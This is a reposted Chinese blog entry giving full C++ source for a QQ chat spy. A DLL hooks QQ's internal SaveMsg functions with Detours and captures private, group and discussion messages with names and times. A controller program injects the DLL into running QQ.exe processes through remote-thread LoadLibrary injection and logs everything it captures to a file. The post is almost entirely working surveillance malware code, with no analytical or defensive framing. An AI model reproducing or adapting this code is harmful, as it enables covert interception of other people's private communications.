注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

BCB-DG's Blog

...

 
 
 

日志

 
 

Hook QQ Message  

2012-08-30 08:30:23|  分类: VNC |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
//轉
#include "stdafx.h"
#include "QQspy.h"
#include "detours.h"
#pragma comment (lib, "detours.lib")
#include <set>
#include <shlwapi.h>
#pragma comment (lib, "shlwapi.lib")

typedef  BOOL  (__cdecl *M_SaveMsg_1)(LPCWSTR lpStr,
                    DWORD dTo_Num,
                    DWORD dFrom_Num,
                    DWORD dTo_Num_2,
                    struct ITXMsgPack * TXMsgPack,
                    struct ITXData* TXData);

typedef BOOL (__cdecl *M_SaveMsg_2)(wchar_t *group,
                  wchar_t *un_1,
                  wchar_t *username,
                  wchar_t *un_1_,
                  int num_1,
                  int num_2,
                  struct ITXMsgPack * TXMsgPack,
                  struct ITXData* TXData);

//?GetMsgTime@Msg@Util@@YA_JPAUITXMsgPack@@@Z
typedef int (__cdecl *M_GetMsgTime)(struct ITXMsgPack *TXMsgPack);
//?GetSelfUin@Contact@Util@@YAKXZ
typedef long (__cdecl *M_GetSelfUin)(void);
typedef PVOID (__cdecl *M_GetPublicName)(LPWSTR *lpBuffer, DWORD dQQNum);
//?GetGroupName@Group@Util@@YA?AVCTXStringW@@K@Z
typedef PVOID (__cdecl *M_GetGroupName)(LPWSTR *lpBuffer, DWORD dGroupNum);
//?GetDiscussName@Group@Util@@YA?AVCTXStringW@@K@Z
typedef PVOID (__cdecl *M_GetDiscussName)(LPWSTR *lpBuffer, DWORD dGroupNum);
//?GetGroupMemLongNickname@Group@Util@@YAHKKAAVCTXStringW@@@Z
typedef int (__cdecl *M_GetGroupMemLongNickname)(unsigned long,unsigned long,CString &);
//?GetGroupMemShowName@Group@Util@@YA?AVCTXStringW@@KK@Z
typedef PVOID (__cdecl *M_GetGroupMemShowName)(ULONG,ULONG);
//?GetSelfUin@Contact@Util@@YAKXZ
typedef long (__cdecl *M_GetSelfUin)(void);
typedef  PVOID (__cdecl *M_GetMsgAbstract)(PVOID lpPar_1, struct ITXMsgPack * TXMsgPack);

M_SaveMsg_1      OldSaveMsg_1 = NULL;
M_SaveMsg_2      OldSaveMsg_2 = NULL;
M_SaveMsg_1      TrueSaveMsg_1 = NULL;
M_SaveMsg_2      TrueSaveMsg_2 = NULL;

M_GetMsgAbstract  TrueGetMsgAbstract = NULL;
M_GetMsgTime    TrueGetMsgTime = NULL;
M_GetGroupName    TrueGetGroupName = NULL;
M_GetDiscussName  TrueGetDiscussName = NULL;
M_GetPublicName    TrueGetPublicName = NULL;
M_GetSelfUin    TrueGetSelfUin = NULL;
M_GetSelfUin    OldGetSelfUin = NULL;

M_GetGroupMemLongNickname TrueGetGroupMemLongNickname = NULL;
M_GetGroupMemShowName TrueGetGroupMemShowName = NULL;

BOOL  __cdecl NewSaveMsg_1(LPCWSTR lpStr,
               DWORD dTo_Num,
               DWORD dFrom_Num,
               DWORD dTo_Num_2,
               struct ITXMsgPack * TXMsgPack,
               struct ITXData* TXData);

BOOL __cdecl NewSaveMsg_2(wchar_t *group,
              wchar_t *un_1,
              wchar_t *username,
              wchar_t *un_1_,
              int num_1,
              int num_2,
              struct ITXMsgPack * TXMsgPack,
              struct ITXData* TXData);

int __cdecl NewGetSelfUin(void)
{
    return 475318423;
}

VOID __cdecl Sendinfo(CString str)
{
    COPYDATASTRUCT myCopyDATA;
    myCopyDATA.cbData=str.GetLength();
    myCopyDATA.lpData=str.GetBuffer(0);
    str.ReleaseBuffer();
    HWND hwnd=::FindWindow(NULL,"QQ");
    if (hwnd) ::SendMessage(hwnd,WM_COPYDATA,NULL,(LPARAM)&myCopyDATA);
}

VOID __stdcall Joker()
{
    ULONG fnGetSelfUin;
    ULONG currentQQ;
    fnGetSelfUin = (ULONG)GetProcAddress(GetModuleHandleA("KernelUtil"), "?GetSelfUin@Contact@Util@@YAKXZ");
    if (fnGetSelfUin)
    {
        currentQQ = ((ULONG (__cdecl*)())fnGetSelfUin)();
        if (currentQQ)
        {
            char buf[64];
            wsprintfA( buf, "Login: %d", currentQQ);
            CString fff = buf;
            fff =fff+"\r\n";
            OutputDebugString( fff);
            theApp.filename=buf;
            Sendinfo(fff);
        }
    }
}

BOOL CQQMonApp::InitInstance()
{
    OutputDebugString("Hook Start");
    HMODULE hModule = GetModuleHandle(_T("KernelUtil.dll"));
    if (hModule == NULL) hModule = LoadLibrary("KernelUtil.dll");
    TrueSaveMsg_1 = (M_SaveMsg_1) GetProcAddress(hModule, "?SaveMsg@Msg@Util@@YAHPB_WKKKPAUITXMsgPack@@PAUITXData@@@Z");     
    if (!TrueSaveMsg_1) return FALSE;
    TrueSaveMsg_2 = (M_SaveMsg_2) GetProcAddress(hModule, "?SaveMsg@Msg@Util@@YAHPB_W000KKPAUITXMsgPack@@PAUITXData@@@Z");     
    if(!TrueSaveMsg_2) return FALSE;
    TrueGetMsgTime = (M_GetMsgTime)GetProcAddress(hModule, "?GetMsgTime@Msg@Util@@YA_JPAUITXMsgPack@@@Z");     
    if (!TrueGetMsgTime) return FALSE;
    TrueGetPublicName = (M_GetPublicName)GetProcAddress(hModule, "?GetPublicName@Contact@Util@@YA?AVCTXStringW@@K@Z");     
    if (!TrueGetPublicName) return FALSE;
    TrueGetGroupName = (M_GetGroupName) GetProcAddress(hModule, "?GetGroupName@Group@Util@@YA?AVCTXStringW@@K@Z");
    if (!TrueGetGroupName) return FALSE;
    TrueGetDiscussName = (M_GetDiscussName) GetProcAddress(hModule, "?GetDiscussName@Group@Util@@YA?AVCTXStringW@@K@Z");
    if (!TrueGetDiscussName) return FALSE;
    TrueGetSelfUin = (M_GetSelfUin)GetProcAddress(hModule, "?GetSelfUin@Contact@Util@@YAKXZ");   
    if (!TrueGetSelfUin) return FALSE;
    TrueGetMsgAbstract = (M_GetMsgAbstract)GetProcAddress(hModule, "?GetMsgAbstract@Msg@Util@@YA?AVCTXStringW@@PAUITXMsgPack@@@Z");     
    if (!TrueGetMsgAbstract) return FALSE;
    //  ?GetGroupMemShowName@Group@Util@@YA?AVCTXStringW@@KK@Z
    //  TrueGetGroupMemShowName = (M_GetGroupMemShowName) GetProcAddress(hModule, "?GetGroupMemShowName@Group@Util@@YA?AVCTXStringW@@KK@Z");
    //  if (!TrueGetGroupMemShowName) break;
    //  ?GetGroupMemLongNickname@Group@Util@@YAHKKAAVCTXStringW@@@Z
    //  TrueGetGroupMemLongNickname = (M_GetGroupMemLongNickname) GetProcAddress(hModule, "?GetGroupMemLongNickname@Group@Util@@YAHKKAAVCTXStringW@@@Z");
    //  if (!TrueGetDiscussName) break;
    if (TrueSaveMsg_1) OldSaveMsg_1 = (M_SaveMsg_1) DetourFunction((PBYTE)TrueSaveMsg_1, (PBYTE)NewSaveMsg_1);
    if (TrueSaveMsg_2) OldSaveMsg_2 = (M_SaveMsg_2) DetourFunction((PBYTE)TrueSaveMsg_2, (PBYTE)NewSaveMsg_2);
    Joker();
    //OldGetSelfUin = (M_GetSelfUin) DetourFunction((PBYTE)TrueGetSelfUin, (PBYTE)NewGetSelfUin);
    return CWinApp::InitInstance();
}

BOOL  __cdecl NewSaveMsg_1(LPCWSTR lpStr,
               DWORD dTo_Num,
               DWORD dFrom_Num,
               DWORD data3,
               struct ITXMsgPack * TXMsgPack,
               struct ITXData* TXData )
{
    long lSelfQQNum = TrueGetSelfUin();
    time_t Time;
    struct tm *local;
    WCHAR wszStringTime[20] = {0};
    Time = (time_t)TrueGetMsgTime(TXMsgPack);
    local = localtime(&Time);
    swprintf(wszStringTime,L"%0.2d:%0.2d:%0.2d",local->tm_hour,local->tm_min,local->tm_sec);
    LPWSTR lpName1 = NULL,lpName2 = NULL;
    if (TrueGetPublicName)
    {
        TrueGetPublicName(&lpName1, dFrom_Num);
        TrueGetPublicName(&lpName2, dTo_Num);
    }
    WCHAR wszStringBuffer[MAX_PATH] = {0};
    CString  ms1;
    CString  ms2;
    if(lSelfQQNum == dFrom_Num)
    {     
        swprintf(wszStringBuffer,L"[个聊][%d]%ws(%u)to(%u) %ws",lSelfQQNum,lpName1,dFrom_Num,dTo_Num,wszStringTime);
        ms1=wszStringBuffer;
    }
    if(lSelfQQNum != dFrom_Num && dTo_Num == lSelfQQNum)
    {     
        swprintf(wszStringBuffer,L"[个聊][%d]%ws(%u)to(%u) %ws",lSelfQQNum,lpName1,dFrom_Num,dTo_Num,wszStringTime);
        ms1=wszStringBuffer;
    }
    CString strBuffer;
    LPWSTR *lpBuffer =(LPWSTR *)TrueGetMsgAbstract(strBuffer.GetBufferSetLength(4096), TXMsgPack);
    ms2=ms1+"\r\n"+*lpBuffer;
    Sendinfo(ms2);
    OutputDebugString(ms2);
    return OldSaveMsg_1(lpStr, dTo_Num, dFrom_Num, data3, TXMsgPack, TXData);
}

BOOL __cdecl NewSaveMsg_2( wchar_t *group, wchar_t *un_1, wchar_t *username, wchar_t *un_1_, int num_1, int num_2, struct ITXMsgPack * TXMsgPack, struct ITXData* TXData )
{
    time_t Time;
    struct tm *local;
    WCHAR wszStringTime[20] = {0};
    Time = (time_t)TrueGetMsgTime(TXMsgPack);
    local = localtime(&Time);
    swprintf(wszStringTime,L"%0.2d:%0.2d:%0.2d",local->tm_hour,local->tm_min,local->tm_sec);
    long lSelfQQNum = TrueGetSelfUin();
    WCHAR wszStringBuffer[2*MAX_PATH] = {0};
    CString strBuffer;
    LPWSTR *lpBuffer =(LPWSTR *) TrueGetMsgAbstract(strBuffer.GetBufferSetLength(4096), TXMsgPack);
    CString strGroup(group); 
    LPWSTR lpName1 = NULL;
    CString ms1;
    if (strGroup.CompareNoCase("group") == 0)
    {
        if (TrueGetPublicName) TrueGetGroupName(&lpName1, num_1);
        //  TXStr Str;
        //  TrueGetGroupMemLongNickname(num_1,num_2,Str);
        //  OutputDebugStringW(Str.str);
        swprintf(wszStringBuffer,L"[群聊][%d][%ws] %ws(%d)(%d) %ws",lSelfQQNum ,lpName1,username, num_1,num_2,wszStringTime);
        ms1=wszStringBuffer;
        ms1=ms1+"\r\n"+*lpBuffer;
        OutputDebugString(ms1);
        Sendinfo(ms1);
    }
    else if (strGroup.CompareNoCase("discuss") == 0)
    {
        if (TrueGetDiscussName) TrueGetDiscussName(&lpName1, num_1);
        swprintf(wszStringBuffer,L"[讨聊][%d][%ws] %ws(%d)(%d) %ws",lSelfQQNum ,lpName1,username, num_1,num_2,wszStringTime);
        ms1=wszStringBuffer;
        ms1=ms1+"\r\n"+*lpBuffer;
        OutputDebugString(ms1);
        Sendinfo(ms1);
    }
    return OldSaveMsg_2(group, un_1, username, un_1_, num_1, num_2, TXMsgPack, TXData);
}

int CQQMonApp::ExitInstance()
{
    OutputDebugString("Hook Exit");
    DetourRemove((PBYTE)OldSaveMsg_1, (PBYTE)NewSaveMsg_1);
    DetourRemove((PBYTE)OldSaveMsg_2, (PBYTE)NewSaveMsg_2);
    //DetourRemove((PBYTE)OldGetSelfUin, (PBYTE)NewGetSelfUin);
    return CWinApp::ExitInstance();
}

///////////////////////////////////////////////////////////////////////////////////////
DWORD CQQSPYDlg::FindByPID(PTSTR pszProcessName)
{
    DWORD dwProcessID = 0;
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) return 0;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if(!Process32First(hProcessSnap, &pe32))
    {
        CloseHandle(hProcessSnap);
        return 0;
    }
    do
    {
        if (strcmp(pszProcessName, pe32.szExeFile) == 0)
        {
            dwProcessID = pe32.th32ProcessID;
            CString  s1;
            s1.Format("%d",dwProcessID);
            int ss=m_list.GetCount();
            int tt=0;
            for (int i=0;i<ss;i++)
            {
                CString  s2;
                m_list.GetText(i,s2);
                if (s1==s2)
                {
                    tt=1;
                    break;
                }
            }
            if (tt==0)
            {
                m_list.AddString(s1);
                TCHAR  Folder[MAX_PATH];
                ::GetCurrentDirectory(MAX_PATH,Folder);
                strcat(Folder, "\\QQMon.dll");
                LPCTSTR s2=_T("F:\\QQ\\QQMon\\Release");
                USES_CONVERSION;
                BOOL bInject=Inject(Folder,pe32.th32ProcessID);
                if (bInject)
                    AfxMessageBox(_T("成功"));
                else
                    AfxMessageBox(_T("失败"));
            }
        }
    }
    while(Process32Next(hProcessSnap, &pe32));
    CloseHandle(hProcessSnap);
    return dwProcessID;
}

BOOL CQQSPYDlg::OnCopyData(CWnd* pWnd, COPYDATASTRUCT* pCopyDataStruct)
{
    CString  m_strCopyData;
    m_strCopyData=(LPSTR)pCopyDataStruct->lpData;
    m_strCopyData=m_strCopyData.Left(pCopyDataStruct->cbData);
    insertmsg(m_strCopyData);
    CString  ml;
    m_edit.GetWindowText(ml);
    m_edit.SetWindowText(ml+m_strCopyData+"\r\n");
    return CDialog::OnCopyData(pWnd, pCopyDataStruct);
}

void CQQSPYDlg::OnBnClickedButton1()
{
    TCHAR pszP[] = TEXT("QQ.exe");
    DWORD dwPID = FindByPID(pszP);
}

BOOL  CQQSPYDlg::Inject(LPCTSTR szModule, DWORD dwID)
{
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwID);
    if ( !hProcess ) return FALSE;
    int cByte  = (_tcslen(szModule)+1) * sizeof(TCHAR);
    LPVOID pAddr = VirtualAllocEx(hProcess, NULL, cByte, MEM_COMMIT, PAGE_READWRITE);
    if ( !pAddr || !WriteProcessMemory(hProcess, pAddr, szModule, cByte, NULL)) return FALSE;
    #ifdef _UNICODE 
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(_T("Kernel32")), "LoadLibraryW");
    #else
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(_T("Kernel32")), "LoadLibraryA");
    #endif
    if ( !pfnStartAddr ) return FALSE;
    DWORD dwThreadID = 0;
    HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, pfnStartAddr, pAddr, 0, &dwThreadID);
    if ( !hRemoteThread ) return FALSE;
    CloseHandle(hRemoteThread); 
    CloseHandle(hProcess);
    return(TRUE);
}

void CQQSPYDlg::insertmsg (CString ss)
{
    CString  m_strCopyData;
    m_strCopyData=ss;
    CString q1="默认消息";
    CString q2="默认消息";
    CString q3="默认消息";
    CString q4="默认消息";
    CString q5="默认消息";
    CString q6="默认消息";
    if ( m_strCopyData.Left(6)=="[讨聊]")
    {
        q2="讨聊";
        CString s1=m_strCopyData.Right(m_strCopyData.GetLength()-7);
        int s2=s1.FindOneOf("]");
        q1=s1.Mid(0,s2);

        CString s3 =s1.Right(s1.GetLength()-s2-2);
        int s4 =s3.FindOneOf("]");
        q3=s3.Mid(0,s4);

        CString s7=s3.Right(s1.GetLength()-s4);
        int   s8 =s7.FindOneOf(")");
        int   s9 =s7.FindOneOf(":");
        q4=s7.Mid(s8+2,s9-s8-6);

        int s5=s1.FindOneOf(":");
        q5=s1.Mid(s5-2,8);
        q6=s1.Right(s1.GetLength()-s5-6);
   }
   if ( m_strCopyData.Left(6)=="[群聊]")
   {
        q2="群聊";
        CString s1=m_strCopyData.Right(m_strCopyData.GetLength()-7);
        int s2=s1.FindOneOf("]");
        q1=s1.Mid(0,s2);
        int s3 =s1.FindOneOf("(");
        int s4 =s1.FindOneOf(")");
        q3=s1.Mid(s3+1,s4-s3-1);

        int s5=s1.FindOneOf("[");
        int s6=s1.Find("]",s5);
        q4=s1.Mid(s5+1,s6-s5-1);

        int s7=s1.FindOneOf(":");
        q5=s1.Mid(s7-2,8);
        q6=s1.Right(s1.GetLength()-s7-6);
   }
   if ( m_strCopyData.Left(6)=="[个聊]")
   {
        q2="个聊";
        CString s1=m_strCopyData.Right(m_strCopyData.GetLength()-7);
        int s2=s1.FindOneOf("]");
        q1=s1.Mid(0,s2);
        int s3= m_strCopyData.FindOneOf("(");
        int s4= m_strCopyData.FindOneOf("to");
        q3=m_strCopyData.Mid(s3+1,s4-s3-2);
        CString s5 =m_strCopyData.Right(m_strCopyData.GetLength()-s4-3);
        int s6 =s5.FindOneOf(")");
        q4 =s5.Mid(0,s6);
        int s7 =s5.FindOneOf(":");
        q5 =s5.Mid(s7-2,8);
        q6=s5.Right(s5.GetLength()-s7-6);
   }

  m_strCopyData =m_strCopyData+"\r\n";
  int nLength =m_strCopyData.GetLength();
  CString fileName; 
  fileName="QQ.log";
  CStdioFile file;  
  file.Open(fileName,CFile::modeCreate |CFile::modeNoTruncate| CFile::modeWrite);
  file.SeekToEnd();
  file.Write( m_strCopyData,nLength); 
  file.Close();
}
  评论这张
 
阅读(2452)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017